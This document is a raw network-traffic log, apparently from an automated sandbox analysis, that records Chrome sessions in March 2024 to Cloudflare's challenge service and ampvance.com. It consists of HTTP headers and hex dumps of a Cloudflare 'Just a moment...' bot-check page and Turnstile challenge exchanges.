                                                      Data Ascii: (1875)]=ik(2324),fS[ik(2436)]=ik(2369),fS[ik(1620)]=ik(2044),fT={},fT[ik(2309)]=ik(1715),fT[ik(846)]=ik(1180),fT[ik(1794)]=ik(1442),fT[ik(838)]=ik(707),fT[ik(920)]=ik(1648),fT[ik(1075)]=ik(1168),fT[ik(2295)]=ik(1342),fT[ik(2247)]=ik(2233),fT[ik(1887)]=ik(


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      14192.168.2.449751104.17.2.1844434632C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:23:18 UTC786OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1
                                                      Host: challenges.cloudflare.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/qb3jj/0x4AAAAAAADnPIDROrmt1Wwj/light/normal
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-03-05 13:23:18 UTC248INHTTP/1.1 200 OK
                                                      Date: Tue, 05 Mar 2024 13:23:18 GMT
                                                      Content-Type: image/png
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cache-control: max-age=2629800, public
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6b7a0a8e0f70-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-03-05 13:23:18 UTC67INData Raw: 33 64 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                                      Data Ascii: 3dPNGIHDRsIDAT$IENDB`
                                                      2024-03-05 13:23:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      15192.168.2.449752104.17.3.1844434632C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:23:19 UTC438OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1
                                                      Host: challenges.cloudflare.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-03-05 13:23:19 UTC248INHTTP/1.1 200 OK
                                                      Date: Tue, 05 Mar 2024 13:23:19 GMT
                                                      Content-Type: image/png
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cache-control: max-age=2629800, public
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6b7e18d4c44a-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-03-05 13:23:19 UTC67INData Raw: 33 64 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                                      Data Ascii: 3dPNGIHDRsIDAT$IENDB`
                                                      2024-03-05 13:23:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      16192.168.2.449753104.21.81.2294434632C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:23:19 UTC852OUTGET /favicon.ico HTTP/1.1
                                                      Host: ampvance.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      sec-ch-ua-full-version: "117.0.5938.132"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://ampvance.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-03-05 13:23:19 UTC1290INHTTP/1.1 403 Forbidden
                                                      Date: Tue, 05 Mar 2024 13:23:19 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Content-Length: 16226
                                                      Connection: close
                                                      Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                      Cross-Origin-Embedder-Policy: require-corp
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Cross-Origin-Resource-Policy: same-origin
                                                      Origin-Agent-Cluster: ?1
                                                      Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                      Referrer-Policy: same-origin
                                                      X-Frame-Options: SAMEORIGIN
                                                      cf-mitigated: challenge
                                                      cf-chl-out: nDftIq7ge14hRdVJtmRWC+HUEQb0w7NJSgg/ISCmhFcH8RiWehGUoGESbYQ1hyPUn0Mxh3AKHzTop4EM17t2lYnZsfq08ftOJU9HoQgpPElLUyCvqUI0/+0Wuin85vAV03JlDDd9fIbnB+G+pMvMXg==$Rk+1+AAEQTbFuKjwt3IrFA==
                                                      Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                      Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                      2024-03-05 13:23:19 UTC401INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 4c 68 50 49 51 35 47 32 69 4f 31 43 43 4c 35 77 31 37 51 53 66 45 75 37 32 73 46 68 77 48 4b 57 4c 64 70 38 67 6d 38 42 5a 4d 6c 64 71 37 74 54 6b 4b 6e 47 66 71 69 30 65 56 46 6a 6b 62 68 51 42 55 78 48 57 72 45 77 25 32 46 36 75 5a 55 36 63 71 6f 63 68 62 5a 69 32 56 35 41 59 76 50 4d 56 78 75 77 41 68 6f 6a 4c 38 4f 4f 4b 42 53 74 57 63 33 35 6e 6e 36 50 25 32 46 4f 45 71 36 4d 66 41 45 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e 45 4c
                                                      Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LhPIQ5G2iO1CCL5w17QSfEu72sFhwHKWLdp8gm8BZMldq7tTkKnGfqi0eVFjkbhQBUxHWrEw%2F6uZU6cqochbZi2V5AYvPMVxuwAhojL8OOKBStWc35nn6P%2FOEq6MfAE%3D"}],"group":"cf-nel","max_age":604800}NEL
                                                      2024-03-05 13:23:19 UTC1047INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70
                                                      Data Ascii: <!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name="viewp
                                                      2024-03-05 13:23:19 UTC1369INData Raw: 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75
                                                      Data Ascii: mciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAu
                                                      2024-03-05 13:23:19 UTC1369INData Raw: 64 79 2e 64 61 72 6b 20 2e 62 69 67 2d 62 75 74 74 6f 6e 2c 62 6f 64 79 2e 64 61 72 6b 20 2e 70 6f 77 2d 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 36 39 33 66 66 3b 63 6f 6c 6f 72 3a 23 31 64 31 64 31 64 7d 62 6f 64 79 2e 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62
                                                      Data Ascii: dy.dark .big-button,body.dark .pow-button{background-color:#4693ff;color:#1d1d1d}body.dark #challenge-success-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ib
                                                      2024-03-05 13:23:19 UTC1369INData Raw: 20 64 69 76 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 35 39 35 39 35 39 20 74 72 61 6e 73 70 61 72 65 6e 74 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 62 6f 64 79 2e 6c 69 67 68 74 20 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 66 63 35 37 34 61 7d 62 6f 64 79 2e 6c 69 67 68 74 20 2e 62 69 67 2d 62 75 74 74 6f 6e 2c 62 6f 64 79 2e 6c 69 67 68 74 20 2e 70 6f 77 2d 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 33 36 38 31 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 30 30 33 36 38 31 3b 63 6f 6c 6f 72 3a 23 66 66 66 7d 62 6f 64 79 2e 6c 69 67 68 74 20 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f
                                                      Data Ascii: div{border-color:#595959 transparent transparent}body.light .font-red{color:#fc574a}body.light .big-button,body.light .pow-button{background-color:#003681;border-color:#003681;color:#fff}body.light #challenge-success-text{background-image:url(data:image/
                                                      2024-03-05 13:23:19 UTC1369INData Raw: 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 63 6f 6c 6f 72 20 2e 31 35 73 20 65 61 73 65 7d 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 65 65 37 33 30 61 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 38 72 65 6d 20 61 75 74 6f 3b 6d 61 78 2d 77 69 64 74 68 3a 36 30 72 65 6d 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 68 65 61 64 69 6e 67 2d 66 61 76 69 63 6f 6e 7b 68 65 69 67 68 74 3a 32 72 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 72 65 6d 3b 77 69 64 74 68 3a 32 72 65 6d 7d 40 6d 65 64 69 61 20 28 77 69 64 74 68 20 3c 3d 20 37 32 30 70 78 29 7b 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 2d 74 6f 70
                                                      Data Ascii: ecoration:none;transition:color .15s ease}a:hover{color:#ee730a;text-decoration:underline}.main-content{margin:8rem auto;max-width:60rem;width:100%}.heading-favicon{height:2rem;margin-right:.5rem;width:2rem}@media (width <= 720px){.main-content{margin-top
                                                      2024-03-05 13:23:19 UTC1369INData Raw: 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 33 34 70 78 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 6e 74 61 69 6e 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72
                                                      Data Ascii: jY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+);padding-left:34px}#challenge-error-text,#challenge-success-text{background-repeat:no-repeat;background-size:contain}#challenge-success-text{backgr
                                                      2024-03-05 13:23:19 UTC1369INData Raw: 74 68 3a 31 30 30 25 7d 2e 66 6f 6f 74 65 72 2d 69 6e 6e 65 72 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 39 64 39 64 39 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 3a 61 66 74 65 72 7b 63 6c 65 61 72 3a 62 6f 74 68 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 2e 35 72 65 6d 3b 77 69 64 74 68 3a 35 30 25 7d 2e 64 69 61 67 6e 6f 73 74 69 63 2d 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 7d 2e 66 6f 6f 74 65 72 20 2e 72 61 79 2d 69 64
                                                      Data Ascii: th:100%}.footer-inner{border-top:1px solid #d9d9d9;padding-bottom:1rem;padding-top:1rem}.clearfix:after{clear:both;content:"";display:table}.clearfix .column{float:left;padding-right:1.5rem;width:50%}.diagnostic-wrapper{margin-bottom:.5rem}.footer .ray-id
                                                      2024-03-05 13:23:19 UTC1369INData Raw: 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 33 37 35 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 77 72 61 70 70 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 22 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 64 69 76 20 69 64 3d 22 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 32 22 3e 3c 73 70 61 6e 20 69 64 3d 22 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 22 3e 45 6e 61 62 6c 65 20 4a 61 76 61 53 63 72 69 70 74 20 61 6e 64 20 63 6f 6f 6b 69 65 73 20 74 6f 20 63 6f 6e 74 69 6e
                                                      Data Ascii: http-equiv="refresh" content="375"></head><body class="no-js"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div id="challenge-error-title"><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to contin
                                                      2024-03-05 13:23:19 UTC1369INData Raw: 49 58 71 66 6e 69 73 5a 4f 6a 73 4e 53 35 78 4d 59 6c 45 46 69 4f 62 75 5a 55 67 44 69 6c 53 6a 4b 77 31 71 6e 39 50 78 70 56 49 33 7a 38 50 4a 4b 57 6c 37 43 43 67 71 5a 46 64 73 31 4c 6b 53 2e 6f 36 74 48 44 35 43 4f 6b 33 48 4c 51 4a 4b 4d 73 67 45 58 67 34 39 5f 35 77 45 73 2e 68 69 55 4c 5a 77 78 64 76 2e 4c 67 68 55 36 4f 44 49 56 66 31 39 53 72 5a 66 4e 39 49 39 63 65 72 61 36 64 5a 58 4e 6b 4a 52 56 57 34 6b 4d 4e 6a 57 72 78 47 34 59 73 55 6b 69 79 65 65 4c 63 55 61 2e 33 33 41 65 41 48 38 55 65 5a 47 74 46 45 5f 77 73 45 37 6b 32 4e 77 51 55 39 30 7a 5a 49 6c 78 41 35 46 38 69 38 61 63 34 72 62 64 62 4e 7a 37 58 79 4f 42 42 38 6e 58 32 63 68 50 37 4a 79 6e 64 47 33 62 64 58 53 54 72 68 6a 4d 6e 68 36 71 6c 68 53 43 39 39 51 6f 46 33 4a 6a 34 77
                                                      Data Ascii: IXqfnisZOjsNS5xMYlEFiObuZUgDilSjKw1qn9PxpVI3z8PJKWl7CCgqZFds1LkS.o6tHD5COk3HLQJKMsgEXg49_5wEs.hiULZwxdv.LghU6ODIVf19SrZfN9I9cera6dZXNkJRVW4kMNjWrxG4YsUkiyeeLcUa.33AeAH8UeZGtFE_wsE7k2NwQU90zZIlxA5F8i8ac4rbdbNz7XyOBB8nX2chP7JyndG3bdXSTrhjMnh6qlhSC99QoF3Jj4w


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      17192.168.2.449755104.17.2.1844434632C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:23:19 UTC917OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/1318590694:1709641463:zSaOyPPd1Tt7Y_AdkvJadIWaaVllOPiN8i5OYGFk-_M/85fa6b76cf6e4369/2573fed2a68f8e4 HTTP/1.1
                                                      Host: challenges.cloudflare.com
                                                      Connection: keep-alive
                                                      Content-Length: 3170
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      Content-type: application/x-www-form-urlencoded
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      CF-Challenge: 2573fed2a68f8e4
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Origin: https://challenges.cloudflare.com
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/qb3jj/0x4AAAAAAADnPIDROrmt1Wwj/light/normal
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-03-05 13:23:19 UTC3170OUTData Raw: 76 5f 38 35 66 61 36 62 37 36 63 66 36 65 34 33 36 39 3d 35 64 34 51 69 51 42 51 48 51 51 51 56 51 79 73 75 53 74 75 38 4a 7a 77 4c 43 38 33 75 4c 75 76 55 4a 71 39 61 75 6b 49 75 64 51 77 61 34 75 24 4b 48 71 49 75 71 51 49 77 6f 75 48 75 7a 74 65 33 34 75 76 75 35 59 61 75 56 75 2d 42 32 67 79 38 51 71 50 75 78 52 34 38 48 75 35 61 38 39 78 75 75 4a 67 75 63 73 75 7a 76 75 33 4e 6f 6b 6a 71 75 78 72 64 75 36 6a 79 77 25 32 62 6f 71 71 61 38 39 74 39 51 4b 6d 74 50 2b 75 49 64 56 48 4f 75 61 75 47 79 79 75 75 49 61 4b 56 34 67 35 4f 75 7a 47 4a 6d 75 51 42 66 61 75 6a 38 7a 31 4e 57 53 70 57 4c 76 73 4f 4f 58 49 75 49 4a 73 75 64 51 75 37 75 4c 49 75 2d 61 4b 6e 57 34 4b 47 35 76 70 76 59 50 43 73 36 2d 38 70 61 4a 51 77 43 4e 4a 42 73 38 66 66 78 45 49
                                                      Data Ascii: v_85fa6b76cf6e4369=5d4QiQBQHQQQVQysuStu8JzwLC83uLuvUJq9aukIudQwa4u$KHqIuqQIwouHuzte34uvu5YauVu-B2gy8QqPuxR48Hu5a89xuuJgucsuzvu3Nokjquxrdu6jyw%2boqqa89t9QKmtP+uIdVHOuauGyyuuIaKV4g5OuzGJmuQBfauj8z1NWSpWLvsOOXIuIJsudQu7uLIu-aKnW4KG5vpvYPCs6-8paJQwCNJBs8ffxEI
                                                      2024-03-05 13:23:19 UTC839INHTTP/1.1 200 OK
                                                      Date: Tue, 05 Mar 2024 13:23:19 GMT
                                                      Content-Type: text/plain; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cf-chl-gen: tMGL4aLqMVgIiKrLlBkODcq3qZxao3svMmH3AkJiuF1uy+DrRSYjr6/omdg+IhZgHJcyFgMUDh098X4HYWXfGk0zCR+W9UdFXAMRxfsIEcArNdArctqjxK6vc6lVpXV+UK6XKY1rrLk1xz+DpSK6yoWm5+hIVVD4txmoQaYmGPGsJfhfx+20TWQgzkKtuAe2xGjDmr9YH3U2qcYIWDfWZf3tbeQaJbdCWipNRpkuNLd2HQQGQ3l3OmpF/+4sUouriMK0prPnreZbMcHyS6tD4s+U+UhvR1uN3PmLKc3T/d99fOyNkHcQXGuj4jgNgBk0N/5vTrs0eu+hp4VqwI9HoqIPJub2YafLQHTvjPgjr8P3/y0281v7VyXZckM1PsBauN7ERFPRkGDSxPbO04FJNWM0jyP7ikPLh/LHi4Q8dhZg2Lmi36EVfutoS2MS61oHw8gLpr16JEqWmAeMQS4MQF9gT57IlaX04uj/y+PSlVGXoFTSlk4nSpUze2LJTINBpGpJ6HxsUN+wtOguCKbSdjDhUDQ/db5bXQkgfVfO/ixYn+uZ+88E+3gzGBRFU8vW$HrRYoHnK8Z+udgXCDU35NA==
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6b7fbd19558a-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-03-05 13:23:19 UTC530INData Raw: 37 63 36 62 0d 0a 73 35 4b 52 67 70 69 6c 78 35 71 46 30 61 58 54 70 34 75 48 74 73 33 42 74 37 66 50 76 61 75 79 30 64 62 54 77 74 6e 64 77 38 50 62 6f 36 61 36 32 71 61 6d 76 4f 44 66 34 65 50 75 31 64 50 66 37 73 71 79 31 4f 6a 4f 73 39 4c 4e 30 51 4b 36 39 75 58 39 38 2f 33 2b 39 4d 41 46 39 4f 54 6e 33 65 48 4b 79 67 66 31 42 75 55 51 36 4f 2f 36 48 65 55 4f 43 78 73 43 41 41 73 53 47 77 37 31 47 68 38 53 39 78 6e 31 48 68 77 72 45 68 41 63 4b 79 73 4d 43 69 55 4a 44 42 41 4b 44 79 37 32 4d 79 48 35 41 7a 4d 37 47 42 73 33 47 45 6f 61 50 53 59 2b 52 6b 73 79 4d 44 74 42 53 6c 59 73 55 54 6c 4b 4a 30 6b 7a 4e 79 77 79 4c 31 38 36 54 7a 34 68 57 6a 6c 61 52 6c 6c 72 51 6b 30 6e 4c 6a 45 77 5a 6a 42 78 54 57 55 30 59 7a 52 79 4f 56 52 50 4f 6c 49 38 51
                                                      Data Ascii: 7c6bs5KRgpilx5qF0aXTp4uHts3Bt7fPvauy0dbTwtndw8Pbo6a62qamvODf4ePu1dPf7sqy1OjOs9LN0QK69uX98/3+9MAF9OTn3eHKygf1BuUQ6O/6HeUOCxsCAAsSGw71Gh8S9xn1HhwrEhAcKysMCiUJDBAKDy72MyH5AzM7GBs3GEoaPSY+RksyMDtBSlYsUTlKJ0kzNywyL186Tz4hWjlaRllrQk0nLjEwZjBxTWU0YzRyOVRPOlI8Q
